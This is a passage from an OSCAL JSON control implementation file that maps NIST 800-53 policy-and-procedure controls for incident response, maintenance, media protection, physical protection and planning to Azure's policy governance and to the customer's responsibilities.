Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"05a2d8b1-81b3-4917-bf7e-766973e3d360","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the incident response policy and procedures.","provided-uuid":"e668c0b3-02af-49d3-ae11-2f08d376690c"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"8d822aae-9c1a-486a-824a-872284850546","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ir-1_smt.c","by-components":[{"uuid":"4e17395b-e1a2-4268-8146-4cede2fa9a7e","export":{"provided":[{"uuid":"70bebf2e-22b0-4949-8a1f-c0f65af38354","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"07fc4596-df26-4271-bbda-99763de5a943","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"IR-08-004"}],"description":"The customer is responsible for reviewing and updating the current incident response policy on a regular basis and following organization defined events.","provided-uuid":"70bebf2e-22b0-4949-8a1f-c0f65af38354"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b0f1ec0b-3ef4-4be9-9929-b20c73e18bc8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"ma-1","statements":[{"uuid":"e77e8ec9-e790-4f61-8e7a-9d5127f0eaf1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ma-1_smt.a","by-components":[{"uuid":"db68b3c0-e5bb-4332-a6b4-c84b9a32dd36","export":{"provided":[{"uuid":"7d62e27a-8401-441e-bcc7-1e58a2dd6bcb","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-001"}],"description":"Azure addresses the system maintenance policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a 
responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Maintenance, utilities, and tools * Data integrity Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with system maintenance are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. 
\nThe Physical and Environmental Security Standard implements the system maintenance policy and associated controls and documents the following procedures: * Maintenance activities * Authorized personnel * Maintenance tickets Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with system maintenance are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"f9f3b927-5b6c-45d2-bc21-6e019264c4c0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-001"}],"description":"The customer is responsible for developing, documenting, and disseminating maintenance policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. 
\nThe customer is responsible for procedures to facilitate the implementation of the maintenance policy and the associated maintenance controls.","provided-uuid":"7d62e27a-8401-441e-bcc7-1e58a2dd6bcb"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"30c28a98-a1f1-4b18-9a4b-9c681e3ad4b3","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ma-1_smt.b","by-components":[{"uuid":"3b991d23-6296-4c5e-be39-bf26c4cc35bf","export":{"provided":[{"uuid":"341812c6-5cc7-46d8-9335-0639013a41e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. 
Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"a0515d0f-82c6-4024-ad9a-f44cfddb9fb2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the maintenance policy and procedures.","provided-uuid":"341812c6-5cc7-46d8-9335-0639013a41e9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b0bd92b9-73a4-4ae9-bd21-7b45bb7f0b7e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"ma-1_smt.c","by-components":[{"uuid":"5a709dc8-a080-44f6-9827-c71871ffc2dc","export":{"provided":[{"uuid":"8e7170e3-69d1-4e9e-afaa-dbad1678bdee","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"bfc38c8a-9ad7-46b6-8eff-9d144e3c7443","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MA-09-004"}],"description":"The customer is responsible for reviewing and updating the current maintenance policy on a regular basis and following organization defined events.","provided-uuid":"8e7170e3-69d1-4e9e-afaa-dbad1678bdee"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"9c8fb35a-bbca-43e9-9845-872cd87c7569","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"mp-1","statements":[{"uuid":"63900af2-5503-4aa3-9f9f-1d266eb6b351","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"mp-1_smt.a","by-components":[{"uuid":"98de1ff4-fa2c-41bd-8a5a-65caa38d623c","export":{"provided":[{"uuid":"2efb80b7-7dd0-42c1-999c-91a1b0c8ef69","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-001"}],"description":"Azure addresses the media protection policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a 
responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * How important organizational records relating to the organization's Information Security Program, independent of media type, must be retained, stored, protected, and, if appropriate, destroyed according to the established information handling procedures for the records Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with media protection are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Microsoft Asset Classification Standard and Asset Protection Standard implements the media protection policy and associated controls and documents the following procedures: * Handling and protection of assets * Asset classification Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with media protection are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"148ab672-f510-4c87-b082-c3da30c723c9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-001"}],"description":"The customer is responsible for developing, documenting, and disseminating media protection policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. Due to there not being any customer-controlled media within the scope of systems deployed on Azure, all media protection controls will be implemented and managed by Azure. However, the customer is still responsible for the appropriate policy and procedure documents. 
\nThe customer is responsible for procedures to facilitate the implementation of the media protection policy and the associated media protection controls.","provided-uuid":"2efb80b7-7dd0-42c1-999c-91a1b0c8ef69"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"475dc7cf-a2e6-4867-969e-b1f79a828ad6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"mp-1_smt.b","by-components":[{"uuid":"d7048308-955f-4822-8918-2315f2190910","export":{"provided":[{"uuid":"7c18e34c-ab20-45af-815a-2563fe691fa9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. 
Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"13919fa8-1b06-48ff-862c-75d2f41f867b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of media protection policy and procedures.","provided-uuid":"7c18e34c-ab20-45af-815a-2563fe691fa9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"9b45ed2b-37e8-44db-86f6-c3d08b38ff96","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"mp-1_smt.c","by-components":[{"uuid":"eba82c34-64e8-4bb1-b249-ba5db414c5f6","export":{"provided":[{"uuid":"551e95f1-34fe-450c-83e3-6f588f2cfe47","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. 
The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"00ea061a-904c-4a9f-b432-af3814d83c8b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"MP-10-004"}],"description":"The customer is responsible for reviewing and updating the current media protection policy on a regular basis and following organization defined events.","provided-uuid":"551e95f1-34fe-450c-83e3-6f588f2cfe47"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"386c1199-fd0a-413a-8dcb-54e5daaff43a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"pe-1","statements":[{"uuid":"d9ad0e25-e2b9-4c1d-b3e6-06cc703073b6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pe-1_smt.a","by-components":[{"uuid":"68bdabd4-7678-43cb-8871-1c1c81d7d1ba","export":{"provided":[{"uuid":"05fed34e-fc0d-47f3-a985-8449feb8e821","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-001"}],"description":"Azure addresses the physical and environmental protection policy as part of the Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all Microsoft personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft 
personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. Within Azure, the MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Prevention of unauthorized access, damage, or interference to Microsoft facilities Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The policies indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with physical and environmental protection are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. 
\nThe Physical and Environmental Security Standard implements the physical and environmental protection policy and associated controls and documents the following procedures: * Physical access control * Cyber Defense Operations (CDOC) operations * Audit and compliance * Technology, applications, and equipment employed at the datacenters Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with physical and environmental protection are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"f5202c5c-7c8a-4a24-83d6-8223ad26f996","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-001"}],"description":"The customer is responsible for developing, documenting, and disseminating physical and environmental protection policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. Due to customers not having physical access to any resources in Azure datacenters, all physical and environmental protection controls will be implemented and managed by Azure. However, the customer is still responsible for the appropriate policy and procedure documents. 
\nThe customer is responsible for procedures to facilitate the implementation of the physical and environmental protection policy and the associated physical and environmental protection controls.","provided-uuid":"05fed34e-fc0d-47f3-a985-8449feb8e821"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a413287b-6ded-4109-b968-03d1c2a5fe6f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pe-1_smt.b","by-components":[{"uuid":"98493dce-db2f-4023-955b-57229f159842","export":{"provided":[{"uuid":"973859d6-9b02-496d-bd90-a4e72905631d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. 
The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"407f9359-e2c9-46c5-ba4e-3dc11c30c422","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of physical and environmental protection policy and procedures.","provided-uuid":"973859d6-9b02-496d-bd90-a4e72905631d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b71e72c5-32a0-4b4d-9d88-cc83130aebf5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pe-1_smt.c","by-components":[{"uuid":"17937dd0-9caf-41d8-bf0a-b2dab2d21d70","export":{"provided":[{"uuid":"f4f48fef-11d7-40b7-8bdd-80888d9f63ab","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-004"}],"description":"The Azure team updates the Azure SOPs at least 
annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. If established, service-team-specific procedures are updated by their respective teams. The individual service teams review and update their respective SOPs at least annually and when required by a significant change."}],"responsibilities":[{"uuid":"0f9e8402-d780-4fb0-a4ea-196cd2715e91","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PE-11-004"}],"description":"The customer is responsible for reviewing and updating the current physical and environmental protection policy on a regular basis and following organization defined events.","provided-uuid":"f4f48fef-11d7-40b7-8bdd-80888d9f63ab"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c3ccce3e-c7e7-41d9-86f4-8677236d35f5","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"management"}],"control-id":"pl-1","statements":[{"uuid":"1338d976-3825-4f75-a632-d05378bcd0cc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-001"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pl-1_smt.a","by-components":[{"uuid":"3d30ff00-be9a-4ada-ad57-6dba7866efe0","export":{"provided":[{"uuid":"f4b4b468-58fa-412b-8f24-f14e87887ec7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-001"}],"description":"Azure addresses the planning policy as part of the 
Microsoft security policies, of which there are two sets: the Microsoft Security Policy (MSP) that is applicable to all personnel, and the Microsoft Security Program Policy (MSPP), which is applicable to all Microsoft personnel that have a responsibility for security. The Microsoft Information Risk Management Council (IRMC) is the governance body with review and approval responsibility for the MSP and MSPP. The MSPP specifically applies to all Microsoft personnel with security objectives such as designing, building, and operating Azure and across all information and processes used in the conduct of Microsoft business. All Azure personnel are accountable and responsible for complying with these guiding principles within their designated roles. The policy addresses the following: * Security policy * Security roles and responsibilities Additionally, the policy addresses the purpose, scope, roles, responsibilities, compliance requirements, and required coordination among the various Microsoft organizations that provide some level of support to all services. The standards indicate Microsoft management's commitment and are a component of the risk management strategy which provides Azure personnel with a current set of clear and concise information security requirements. The MSP is available to all Microsoft personnel on the Microsoft Policy website on the Microsoft intranet, and the MSPP and Security Standards are available through the Liquid tool, also on the Microsoft intranet. The Azure SOPs are stored in the Azure Security, Privacy & Compliance SharePoint site. This SharePoint site is accessible to all Azure personnel. Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with planning are documented and stored within internal Azure SharePoint sites. 
Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures. \nThe Azure Security Assessment and Authorization Standard Operating Procedure (SOP) implements the planning policy and associated controls and documents the following procedures: * Documentation * Plans of action and milestones Service teams may supplement the Azure policies and procedures with offering-specific policies and procedures. Service-team-specific policies and procedures associated with planning are documented and stored within internal Azure SharePoint sites. Only personnel with authorized credentials, adequate levels of permission, legitimate need to know, and specific roles and responsibilities are given access to the service-team-specific policies or procedures."}],"responsibilities":[{"uuid":"79345cdf-3713-48eb-9cb3-70ab6e71c77b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-001"}],"description":"The customer is responsible for developing, documenting, and disseminating planning protection policy and procedures that addresses purpose, scope, roles, responsibilities, management commitment, coordination among organizational entities, and compliance; and is consistent with applicable laws, executive orders, directives, regulations, policies, standards, and guidelines. 
\nThe customer is responsible for procedures to facilitate the implementation of the planning policy and the associated planning controls.","provided-uuid":"f4b4b468-58fa-412b-8f24-f14e87887ec7"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a0e345d2-6b3b-41ee-a558-443e9b2c3987","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-003"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pl-1_smt.b","by-components":[{"uuid":"b830f28c-cf67-48e3-924a-51d3ea34cb4a","export":{"provided":[{"uuid":"cd08b31b-cb57-4cac-9ee0-e755a2d61c7d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-003"}],"description":"The Microsoft Information Risk Management Council (IRMC) organization is the governance body with approval responsibility for the Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP). The IRMC consists of representatives from security and risk management teams across Microsoft including Core Services Engineering and Operations (CSEO), Azure, and Global Security. The Customer Security and Trust: Security Engineering (CST-SE) organization manages the review and approval process and maintains the policies. On an annual basis, the CST-SE conducts a line-by-line review of the MSP and MSPP. The Microsoft Security Policy (MSP) and Microsoft Security Program Policy (MSPP) Governance document describes each member's role, types and frequency of review, escalation paths, approval process, and formal publishing procedures of the security policy. 
Throughout the year, if necessary, CST-SE may convene with the IRMC to conduct reviews after a significant review or change request. The approved policy update is published within the relevant tool on the Microsoft intranet. If service teams establish service-specific or team-specific policies, the respective service teams update the necessary policies at least annually."}],"responsibilities":[{"uuid":"23737d2d-0508-4993-b840-18fff4ad37ac","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-003"}],"description":"The customer is responsible for designating an official to manage the development, documentation, and dissemination of the planning policy and procedures.","provided-uuid":"cd08b31b-cb57-4cac-9ee0-e755a2d61c7d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"a1f3372b-baa0-4c37-a581-0ba45cc0a6ca","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-004"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"pl-1_smt.c","by-components":[{"uuid":"4dce76ed-730f-4dcc-89e2-2218d03dab13","export":{"provided":[{"uuid":"ee23477d-d84d-43ce-be37-64777009eb35","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"PL-12-004"}],"description":"The Azure team updates the Azure SOPs at least annually through a formal review process. If needed, the Azure team updates the SOP after a significant change affecting policy execution as well. 